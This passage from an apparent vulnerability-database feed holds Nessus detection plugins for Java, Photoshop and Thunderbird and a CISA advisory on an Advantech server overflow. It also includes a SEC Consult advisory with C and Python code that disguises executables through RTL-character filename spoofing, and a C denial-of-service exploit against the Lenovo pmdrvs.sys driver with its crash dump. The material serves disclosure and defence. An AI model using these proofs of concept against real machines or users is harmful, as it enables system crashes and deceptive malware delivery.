preg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP0/1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"java-1_8_0-openjdk-accessibility-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"java-1_8_0-openjdk-debuginfo-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"java-1_8_0-openjdk-debugsource-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"java-1_8_0-openjdk-src-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"java-1_8_0-openjdk-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"java-1_8_0-openjdk-debuginfo-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"java-1_8_0-openjdk-debugsource-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"java-1_8_0-openjdk-demo-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"java-1_8_0-openjdk-demo-debuginfo-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"java-1_8_0-openjdk-devel-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"java-1_8_0-openjdk-devel-debuginfo-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"java-1_8_0-openjdk-headless-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"java-1_8_0-openjdk-headless-debuginfo-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"java-1_8_0-openjdk-accessibility-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"java-1_8_0-openjdk-debuginfo-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"java-1_8_0-openjdk-debugsource-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", 
sp:\"0\", reference:\"java-1_8_0-openjdk-src-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"java-1_8_0-openjdk-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"java-1_8_0-openjdk-debuginfo-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"java-1_8_0-openjdk-debugsource-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"java-1_8_0-openjdk-demo-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"java-1_8_0-openjdk-demo-debuginfo-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"java-1_8_0-openjdk-devel-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"java-1_8_0-openjdk-devel-debuginfo-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"java-1_8_0-openjdk-headless-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"java-1_8_0-openjdk-headless-debuginfo-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"java-1_8_0-openjdk-accessibility-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"java-1_8_0-openjdk-debuginfo-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"java-1_8_0-openjdk-debugsource-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"java-1_8_0-openjdk-src-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"java-1_8_0-openjdk-accessibility-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"java-1_8_0-openjdk-debuginfo-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"java-1_8_0-openjdk-debugsource-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", 
reference:\"java-1_8_0-openjdk-src-1.8.0.232-3.27.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1_8_0-openjdk\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-12-13T06:36:49", "bulletinFamily": "scanner", "description": "The version of Adobe Photoshop CC installed on the remote Windows host is prior to 20.0.8 (2019.0.8), 21.0.2 (2020.0.2).\nIt is, therefore, affected by multiple unspecified memory corruption vulnerabilities. An attacker can exploit this\nto execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application", "modified": "2019-12-02T00:00:00", "published": "2019-12-12T00:00:00", "id": "ADOBE_PHOTOSHOP_APSB19-56.NASL", "href": "https://www.tenable.com/plugins/nessus/132022", "title": "Adobe Photoshop CC 20.x <= 20.0.7 / 21.x <= 21.0.1 Multiple Vulnerabilities (APSB19-56)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132022);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/12/12\");\n\n script_cve_id(\"CVE-2019-8253\", \"CVE-2019-8254\");\n script_xref(name:\"IAVA\", value:\"2019-A-0297\");\n\n script_name(english:\"Adobe Photoshop CC 20.x <= 20.0.7 / 21.x <= 21.0.1 Multiple Vulnerabilities (APSB19-56)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Adobe Photoshop installed on the remote Windows host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Photoshop CC installed on the remote Windows host is prior to 20.0.8 (2019.0.8), 21.0.2 (2020.0.2).\nIt is, therefore, affected by multiple unspecified memory 
corruption vulnerabilities. An attacker can exploit this\nto execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/photoshop/apsb19-56.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Photoshop CC version 20.0.8 (2019.0.8), 21.0.2 (2020.0.2) or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-8253\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:photoshop_cc\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"adobe_photoshop_installed.nasl\");\n script_require_keys(\"installed_sw/Adobe Photoshop\", \"SMB/Registry/Enumerated\");\n exit(0);\n}\n\ninclude('vcf.inc');\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\n\napp_info = vcf::get_app_info(app:'Adobe Photoshop', win_local:TRUE);\n\nif ('CC' >!< app_info.Product) vcf::vcf_exit(0, 'Only Adobe Photoshop CC is affected.');\n\nconstraints = [\n { 'min_version' : '20', 'max_version' : '20.0.7', 'fixed_version' : '20.0.8' },\n { 'min_version' : '21', 'max_version' : '21.0.1', 'fixed_version' : '21.0.2' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-13T08:09:41", "bulletinFamily": "scanner", "description": "The version of Thunderbird installed on the remote Windows host is prior to 68.3. It is, therefore, affected by multiple\nvulnerabilities as referenced in the mfsa2019-38 advisory. 
Note that Nessus has not tested for this issue but has\ninstead relied only on the application", "modified": "2019-12-02T00:00:00", "published": "2019-12-12T00:00:00", "id": "MOZILLA_THUNDERBIRD_68_3.NASL", "href": "https://www.tenable.com/plugins/nessus/131956", "title": "Mozilla Thunderbird < 68.3", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from Mozilla Foundation Security Advisory mfsa2019-38.\n# The text itself is copyright (C) Mozilla Foundation.\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131956);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/12/12\");\n\n script_cve_id(\n \"CVE-2019-11745\",\n \"CVE-2019-13722\",\n \"CVE-2019-17005\",\n \"CVE-2019-17008\",\n \"CVE-2019-17009\",\n \"CVE-2019-17010\",\n \"CVE-2019-17011\",\n \"CVE-2019-17012\"\n );\n script_xref(name:\"MFSA\", value:\"2019-38\");\n\n script_name(english:\"Mozilla Thunderbird < 68.3\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A mail client installed on the remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Thunderbird installed on the remote Windows host is prior to 68.3. It is, therefore, affected by multiple\nvulnerabilities as referenced in the mfsa2019-38 advisory. 
Note that Nessus has not tested for this issue but has\ninstead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2019-38/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Mozilla Thunderbird version 68.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-17012\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:thunderbird\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mozilla_org_installed.nasl\");\n script_require_keys(\"Mozilla/Thunderbird/Version\");\n\n exit(0);\n}\n\ninclude('mozilla_version.inc');\n\ninstalls = get_kb_list(\"SMB/Mozilla/Thunderbird/*\");\nif (isnull(installs)) audit(AUDIT_NOT_INST, \"Thunderbird\");\n\nmozilla_check_version(installs:installs, product:'thunderbird', esr:FALSE, fix:'68.3', severity:SECURITY_WARNING);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "ics": [{"lastseen": "2019-12-12T20:20:49", "bulletinFamily": "info", "description": "## 1\\. 
EXECUTIVE SUMMARY\n\n * **CVSS v3 9.8**\n * **ATTENTION:** Exploitable remotely/low skill level to exploit\n * **Vendor:** Advantech\n * **Equipment:** DiagAnywhere Server\n * **Vulnerability:** Stack-based Buffer Overflow\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of this vulnerability may allow remote code execution.\n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nThe following versions of DiagAnywhere Server, used for remotely monitoring and controlling other Windows-based devices, are affected:\n\n * DiagAnywhere Server Versions 3.07.11 and prior\n\n### 3.2 VULNERABILITY OVERVIEW\n\n#### 3.2.1 [STACK-BASED BUFFER OVERFLOW CWE-121](<https://cwe.mitre.org/data/definitions/121.html>)\n\nMultiple stack-based buffer overflow vulnerabilities exist in the file transfer service listening on the TCP port. Successful exploitation could allow an unauthenticated attacker to execute arbitrary code with the privileges of the user running DiagAnywhere Server.\n\n[CVE-2019-18257](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-18257>) has been assigned to these vulnerabilities. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n### 3.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS:** Critical Manufacturing, Energy, Water and Wastewater Systems\n * **COUNTRIES/AREAS DEPLOYED:** East Asia, United States, and Europe\n * **COMPANY HEADQUARTERS LOCATION:** Taiwan\n\n### 3.4 RESEARCHER\n\nZ0mb1E, working with Trend Micro\u2019s Zero Day Initiative, reported this vulnerability to CISA.\n\n## 4\\. MITIGATIONS\n\nAdvantech has phased out DiagAnywhere Server Version 3.07.11 and removed it from its website. \nAdvantech has released Version 3.07.14 of DiagAnywhere Server to address the reported vulnerability. 
Users can download the latest version of DiagAnywhere Server by accessing the Advantech Support Portal at [DiagAnywhere Server update](<https://gcc01.safelinks.protection.outlook.com/?url=https%3A%2F%2Fwww.advantech.tw%2Fcontact%2Finquiryrequestform%3Fsubject%3Dtechnical%252bsupport&data=02%7C01%7Ckent.norris%40inl.gov%7C449fb83721f346b6eacb08d77e1527e4%7C4cf464b7869a42368da2a98566485554%7C0%7C1%7C637116501670835959&sdata=1Bu4oPEhrYMhfmHoWEBDuGvehe2PSWX%2Fc9DtL%2FVyS3E%3D&reserved=0>).\n\nCISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are [not accessible from the Internet](<https://www.us-cert.gov/ics/alerts/ICS-ALERT-10-301-01>).\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nCISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nCISA also provides a section for [control systems security recommended practices](<https://www.us-cert.gov/ics/recommended-practices>) on the ICS webpage on [us-cert.gov](<https://www.us-cert.gov/ics>). 
Several recommended practices are available for reading and download, including [Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies](<https://www.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>).\n\nAdditional mitigation guidance and recommended practices are publicly available on the [ICS webpage on us-cert.gov](<https://www.us-cert.gov/ics>) in the Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<https://www.us-cert.gov/ics/tips/ICS-TIP-12-146-01B>). \n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.\n\nNo known public exploits specifically target this vulnerability.\n\n## Contact Information\n\nFor any questions related to this report, please contact the NCCIC at: \n \nEmail: [NCCICCUSTOMERSERVICE@hq.dhs.gov](<mailto:NCCICCUSTOMERSERVICE@hq.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: http://ics-cert.us-cert.gov \nor incident reporting: https://ics-cert.us-cert.gov/Report-Incident?\n\nThe NCCIC continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\nWas this document helpful? 
Yes | Somewhat | No\n", "modified": "2019-12-12T00:00:00", "published": "2019-12-12T00:00:00", "id": "ICSA-19-346-01", "href": "https://www.us-cert.gov//ics/advisories/icsa-19-346-01", "title": "Advantech DiagAnywhere Server", "type": "ics", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2019-12-12T23:36:08", "bulletinFamily": "exploit", "description": "", "modified": "2019-12-12T00:00:00", "published": "2019-12-12T00:00:00", "id": "PACKETSTORM:155659", "href": "https://packetstormsecurity.com/files/155659/Windows-Defender-Antivirus-4.18.1908.7-0-File-Extension-Spoofing.html", "title": "Windows Defender Antivirus 4.18.1908.7-0 File Extension Spoofing", "type": "packetstorm", "sourceData": "`SEC Consult Vulnerability Lab Security Advisory < 20191211-0 > \n======================================================================= \ntitle: File Extension Spoofing \nproduct: Windows Defender Antivirus \nvulnerable version: 4.18.1908.7-0 \nfixed version: Virus Definition Update of 2019/09/30 \nCVE number: - \nimpact: High \nhomepage: https://www.microsoft.com/de-at/windows/comprehensive-security \nfound: 2019-09-25 \nby: David Haintz (Office Vienna) \nSEC Consult Vulnerability Lab \n \nAn integrated part of SEC Consult \nEurope | Asia | North America \n \nhttps://www.sec-consult.com \n \n======================================================================= \n \nVendor description: \n------------------- \n\"Keep your PC safe with trusted antivirus protection built-in to Windows 10. \nWindows Defender Antivirus delivers comprehensive, ongoing and real-time \nprotection against software threats like viruses, malware and spyware across \nemail, apps, the cloud and the web.\" \n \nSource: https://www.microsoft.com/de-at/windows/comprehensive-security \n \n \nBusiness recommendation: \n------------------------ \nUpdate to the latest version of the Windows Defender Antivirus definitions. 
\n \n \nVulnerability overview/description: \n----------------------------------- \nThe vulnerability is based on the file extension spoofing method using the RTL \nunicode character to display a spoofed file extension. This method uses the LTR \nunicode character, that instructs the following text to be shown in left-to-right \norder. Lets assume [LTR] is the LTR unicode character, an attacker can use this \nunicode character to fool a user into believing that a file has a different extension. \n \nFor example an attacker may name an executable file (.exe) 'spoofed-[LTR]gpj.exe', \nwhich would be displayed as 'spoofed-exe.jpg' on an LTR-based system. The most important \npoint here is to have the extension you want to be shown in reverse order, since it will \nbe shown right-to-left. \nCombined with the right file icon, an attacker can imitate an arbitrary file extension. \n \nSame goes for other extensions too, like 'xlsx' for a Microsoft Excel Sheet. During testing \nit happened that 'xlsx' was typed in the wrong order ('xslx' instead of 'xlsx' since reverse \norder) and Windows Defender Antivirus removed the test file while we tried to execute it. \nAs a result, two files were created, with the exact same executable but with different fake \nextensions: \n1. spoofed-[RTL]xslx.exe (displayed as 'spoofed-exe.xlsx') \n2. spoofed-[RTL]xlsx.exe (displayed as 'spoofed-exe.xslx') \n \nThe second one was deleted, while the first one could be executed without any problem. \n \nTherefore, other extensions related to Microsoft Office were tested as well, but it seems \nonly the xlsx extension had a detection for it. \n \n \nWhile the security issue of spoofing the file extension by using the RTL unicode character \n(on RTL systems it is the same just with LTR) is widely known, it seems to be unknown that \nMicrosoft already started to add detection mechanisms for this issue. 
But since it is not \nimplemented for all extensions and it seems to be implemented in the wrong order, this \nfeature is mostly unknown. \n \n \nProof of concept: \n----------------- \nFor the proof of concept a file has to be renamed in Unicode mode using the Unicode \ncharacter '202E' ('\\u202E' in C), which stands for RTL. The sample code is written in \nC/C++ and uses the unicode API of Windows. A Python PoC has been made as well. \n \nC/C++: \n \n#include <Windows.h> \n \nint main(int argc, char** argv) \n{ \nwchar_t opath[] = L\"test.exe\"; \nwchar_t npath_ok[] = L\"spoofed-\\u202Exslx.exe\"; // String for filename 'spoofed-exe.xlsx' \nwchar_t npath_wrong[] = L\"spoofed-\\u202Exlsx.exe\"; // String for filename 'spoofed-exe.xslx' \n \n// Copy 'test.exe' to file shown as 'spoofed-exe.xlsx' \nCopyFileW(opath, npath_ok, false); \n// Copy 'test.exe' to file shown as 'spoofed-exe.xslx' \nCopyFileW(opath, npath_wrong, false); \n} \n \n \nPython: \n \nfrom shutil import copyfile \n \nopath = \"test.exe\" \nnpath_ok = \"spoofed-\\u202Exslx.exe\" # String for filename 'spoofed-exe.xlsx' \nnpath_wrong = \"spoofed-\\u202Exlsx.exe\" # String for filename 'spoofed-exe.xslx' \n \n# Copy 'test.exe' to file shown as 'spoofed-exe.xlsx' \ncopyfile(opath, npath_ok) \n# Copy 'test.exe' to file shown as 'spoofed-exe.xslx' \ncopyfile(opath, npath_wrong) \n \n \nThere will be two new files after the execution (as long as 'test.exe' exists) and the file \nshown as 'spoofed-exe.xslx' will be deleted while trying to execute (or earlier) as shown \nin figure 1. \n \n[ win-defender-ext-spoofing1.png ] \nFigure 1: File gets deleted by Windows Defender Antivirus. \n \n \nBut the file shown as 'spoofed-exe.xlsx' will be executed without any problem. \n \n[ win-defender-ext-spoofing2.png ] \nFigure2: Test file is executed. 
\n \n \n \nVulnerable / tested versions: \n----------------------------- \nWindows Defender Antivirus has been tested in its latest version 4.18.1908.7-0, updated at 25th \nof September 2019. \n \n \nVendor contact timeline: \n------------------------ \n2019-09-26: Providing vendor the advisory through secure@microsoft.com \n2019-10-01: Microsoft answered that this is no vulnerability, but the virus definition \ndatabase will be updated \n2019-12-11: Public release of security advisory \n \n \nSolution: \n--------- \nThe update of the virus definition database of the 30th of September provides a fix. \n \n \nWorkaround: \n----------- \nThere is no workaround available. \n \n \nAdvisory URL: \n------------- \nhttps://www.sec-consult.com/en/vulnerability-lab/advisories/index.html \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nSEC Consult Vulnerability Lab \n \nSEC Consult \nEurope | Asia | North America \n \nAbout SEC Consult Vulnerability Lab \nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It \nensures the continued knowledge gain of SEC Consult in the field of network \nand application security to stay ahead of the attacker. The SEC Consult \nVulnerability Lab supports high-quality penetration testing and the evaluation \nof new offensive and defensive technologies for our customers. Hence our \ncustomers obtain the most current information about vulnerabilities and valid \nrecommendation about the risk profile of new technologies. \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \nInterested to work with the experts of SEC Consult? \nSend us your application https://www.sec-consult.com/en/career/index.html \n \nInterested in improving your cyber security with the experts of SEC Consult? 
\nContact our local offices https://www.sec-consult.com/en/contact/index.html \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nMail: research at sec-consult dot com \nWeb: https://www.sec-consult.com \nBlog: http://blog.sec-consult.com \nTwitter: https://twitter.com/sec_consult \n \nEOF David Haintz / @2019 \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/155659/SA-20191211-0.txt"}], "zdt": [{"lastseen": "2019-12-12T14:52:22", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2019-12-12T00:00:00", "published": "2019-12-12T00:00:00", "id": "1337DAY-ID-33654", "href": "https://0day.today/exploit/description/33654", "title": "Lenovo Power Management Driver 1.67.17.48 - (pmdrvs.sys) Denial of Service Exploit", "type": "zdt", "sourceData": "# Exploit Title: Lenovo Power Management Driver 1.67.17.48 - 'pmdrvs.sys' Denial of Service (PoC)\r\n# Exploit Author: Nassim Asrir\r\n# CVE: CVE-2019-6192\r\n# Tested On: Windows 10(64bit) | ThinkPad T470p\r\n# Vendor : https://www.lenovo.com/us/en/\r\n# Ref : https://support.lenovo.com/us/fr/solutions/len-29334\r\n\r\n# Description\r\n# A vulnerability in pmdrvs.sys driver has been discovered in Lenovo Power Management Driver\r\n# The vulnerability exists due to insuffiecient input buffer validation when the driver processes IOCTL codes\r\n# Attackers can exploit this issue to cause a Denial of Service or possibly execute arbitrary code in kernel space.\r\n\r\n# Exploit\r\n\r\n#include <windows.h>\r\n#include <stdio.h>\r\n#include <conio.h>\r\n\r\nint main(int argc, char **argv)\r\n{\r\n HANDLE hDevice;\r\n DWORD bret;\r\n char szDevice[] = \"\\\\\\\\.\\\\pmdrvs\";\r\n\r\n printf(\"--[ Lenovo Power Management Driver pmdrvs.sys Denial Of Service ]--\\n\");\r\n\r\n printf(\"Opening handle to driver..\\n\");\r\n \r\n if ((hDevice = CreateFileA(szDevice, GENERIC_READ | 
GENERIC_WRITE,0,0,OPEN_EXISTING,0,NULL)) != INVALID_HANDLE_VALUE) {\r\n printf(\"Device %s succesfully opened!\\n\", szDevice);\r\n printf(\"\\tHandle: %p\\n\", hDevice);\r\n }\r\n else\r\n {\r\n printf(\"Error: Error opening device %s\\n\", szDevice);\r\n }\r\n\r\n printf(\"\\nPress any key to DoS..\");\r\n _getch();\r\n\r\n bret = 0;\r\n \r\n if (!DeviceIoControl(hDevice, 0x80862013, (LPVOID)0xdeadbeef, 0x0, (LPVOID)0xdeadbeef, 0x0, &bret, NULL))\r\n {\r\n printf(\"DeviceIoControl Error - bytes returned %#x\\n\", bret);\r\n }\r\n\r\n CloseHandle(hDevice);\r\n return 0;\r\n}\r\n\r\n\r\n# RCA\r\n\r\n2: kd> !analyze -v\r\n*******************************************************************************\r\n* *\r\n* Bugcheck Analysis *\r\n* *\r\n*******************************************************************************\r\n\r\nSYSTEM_SERVICE_EXCEPTION (3b)\r\nAn exception happened while executing a system service routine.\r\nArguments:\r\nArg1: 00000000c0000005, Exception code that caused the bugcheck\r\nArg2: fffff80428bf109d, Address of the instruction which caused the bugcheck\r\nArg3: ffffc709dee8ec50, Address of the context record for the exception that caused the bugcheck\r\nArg4: 0000000000000000, zero.\r\n\r\nFAULTING_IP:\r\npmdrvs+109d\r\nfffff804`28bf109d 8b07 mov eax,dword ptr [rdi]\r\n\r\nCONTEXT: ffffc709dee8ec50 -- (.cxr 0xffffc709dee8ec50)\r\nrax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8\r\nrdx=ffffca04ca8f8170 rsi=ffffca04ca8f8170 rdi=0000000000000000\r\nrip=fffff80428bf109d rsp=ffffc709dee8f640 rbp=ffffca04cc188290\r\n r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020\r\nr11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40\r\nr14=0000000000000002 r15=0000000000000000\r\niopl=0 nv up ei pl zr na po nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010246\r\npmdrvs+0x109d:\r\nfffff804`28bf109d 8b07 mov eax,dword ptr [rdi] ds:002b:00000000`00000000=????????\r\nResetting default scope\r\n\r\nCPU_COUNT: 
8\r\n\r\nCPU_MHZ: af8\r\n\r\nCPU_VENDOR: GenuineIntel\r\n\r\nCPU_FAMILY: 6\r\n\r\nCPU_MODEL: 9e\r\n\r\nCPU_STEPPING: 9\r\n\r\nCPU_MICROCODE: 0,0,0,0 (F,M,S,R) SIG: 8E'00000000 (cache) 0'00000000 (init)\r\n\r\nBLACKBOXBSD: 1 (!blackboxbsd)\r\n\r\n\r\nBLACKBOXPNP: 1 (!blackboxpnp)\r\n\r\n\r\nCURRENT_IRQL: 0\r\n\r\nANALYSIS_SESSION_HOST: LAPTOP-SP\r\n\r\nANALYSIS_SESSION_TIME: 09-30-2019 20:29:54.0485\r\n\r\nANALYSIS_VERSION: 10.0.17763.132 amd64fre\r\n\r\nLAST_CONTROL_TRANSFER: from fffff80428bf5060 to fffff80428bf109d\r\n\r\nSTACK_TEXT: \r\nffffc709`dee8f640 fffff804`28bf5060 : 00000000`00000000 ffff9980`05b00099 00000000`00000000 00000000`00000000 : pmdrvs+0x109d\r\nffffc709`dee8f6c0 fffff804`1f12dba9 : ffffca04`ca8f80a0 fffff804`1f6d6224 ffffca04`cc51ff20 00000000`00000000 : pmdrvs+0x5060\r\nffffc709`dee8f6f0 fffff804`1f6abb11 : ffffc709`dee8fa80 ffffca04`ca8f80a0 00000000`00000001 ffffca04`cc188290 : nt!IofCallDriver+0x59\r\nffffc709`dee8f730 fffff804`1f6d763c : ffffca04`00000000 ffffca04`cc188290 ffffc709`dee8fa80 ffffc709`dee8fa80 : nt!NtQueryInformationFile+0x1071\r\nffffc709`dee8f7e0 fffff804`1f64c356 : 00007fff`2fd66712 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtClose+0xffc\r\nffffc709`dee8f920 fffff804`1f27a305 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtDeviceIoControlFile+0x56\r\nffffc709`dee8f990 00007fff`33aaf844 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!setjmpex+0x7925\r\n00000000`0068fcf8 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : 